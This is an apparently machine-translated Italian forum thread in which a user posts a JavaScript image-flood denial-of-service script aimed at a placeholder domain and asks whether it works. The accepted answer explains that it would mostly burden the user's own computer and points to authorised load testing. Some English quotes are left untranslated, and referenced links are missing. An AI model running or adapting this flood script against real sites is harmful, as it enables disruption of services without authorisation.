Come posso sapere se un attacco denial-of-service sta funzionando / Questo attacco funzionerebbe? [chiuso]

Question

Come posso sapere se un attacco denial-of-service sta funzionando / Questo attacco funzionerebbe? [chiuso]

#1 da (2 voti)

-4

Dire che voglio testare la sicurezza di un sito e decido di inviare un attacco DOS contro di esso usando uno script javascript:

 function imgflood(link, uri) {  
   var TARGET = link;
   var URI = uri;
   var pic = new Image();
   var rand = Math.floor(Math.random() * 10000000);
   pic.src = 'http:'+TARGET+URI+rand+'=val';
 }
 function DOSATTACK(link){
 var domain = link;
 setInterval(function(){
   var i = 0;
   var img = document.createElement('img');
   img.setAttribute('src', 'ftp://' + domain + ':80/image' + new 
 Date().getTime() + i );
   document.body.appendChild(img);
 }, 1);  
 }

 setInterval(function(){
   imgflood("ASite.com","/index.html");
   DOSATTACK("ASite.com");

}, 500);

Ho 2 domande: Uno, come potrei essere in grado di dire se sto facendo alcun danno, oltre al solo ritardo del sito (perché potrebbe essere il mio computer in ritardo perché sto facendo un sacco di immagini per il sito).

Due, questo script funzionerebbe del tutto o userebbe solo la mia larghezza di banda fino a quando il mio computer non si arrestasse. Ho notato che il mio computer potrebbe essere in ritardo, ma posso chiudere la scheda e accedere facilmente a un altro sito.

javascript denial-of-service ddos

posta The Gamer King 26.05.2017 - 03:25

fonte

1 risposta

Leggi altre domande sui tag javascript denial-of-service ddos

Come posso sfruttare un'iniezione SQL basata sul tempo senza utilizzare le virgolette singole? Confronto tra antivirus

score 2 · Accepted Answer

Per rispondere insieme alle due domande. No, non lo farebbero: è semplicemente improbabile che il computer abbia la quantità di larghezza di banda necessaria per l'uscita e anche se fosse il computer sarebbe il collo di bottiglia che esegue il codice lato client e non causa alcun impatto sul server.

Hai chiesto

"how would I be able to tell if I'm doing any damage, other than just the site lagging (because that could be my computer lagging because I'm making a ton of images for the site)."

Puoi capire se funziona controllando il sito da un'altra rete. Se ad esempio il tuo telefono che utilizza la rete di provider di telefonia mobile, non il tuo wifi, mostra il rallentamento del sito, quindi potrebbe avere un impatto. - Questo è ancora improbabile

would this script work at all or would it just use up my bandwidth until my computer crashed. I've noticed my computer might lag a bit but I can close the tab and get on another site easily.

È improbabile che lo script funzioni, il codice è lato client ed è probabile che tu abbia un impatto sul tuo computer locale.

Inoltre non sono sicuro del motivo per cui dovresti provare a farlo tramite il browser e / o JavaScript? Anche in questo caso il codice è lato client e la memoria e la CPU dei computer locali si prenderanno il peso dell'esecuzione del codice. Potrebbe essere meglio esaminare metodi alternativi in quanto questo approccio sembra non dare alcun risultato rispetto ai costi generali.

Se stavi conducendo veri test di penetrazione, i link sono meglio usati. Consentono di condurre test di carico remoto puntando i client virtuali su un server web. Possono quindi replicare gli utenti sul sistema, dato che un numero sufficiente di utenti virtuali potrebbe causare il blocco di un sito. Questi siti sono esclusivamente per testare i propri siti o per i siti che si dispone dell'autorità legale per testare.

Infine, non è sicuro che questo sia il posto giusto per ottenere un codice di attacco specifico dato che hai chiaramente indicato il dominio nel tuo codice. Suggerirei che questo forum non è quello che devi usare.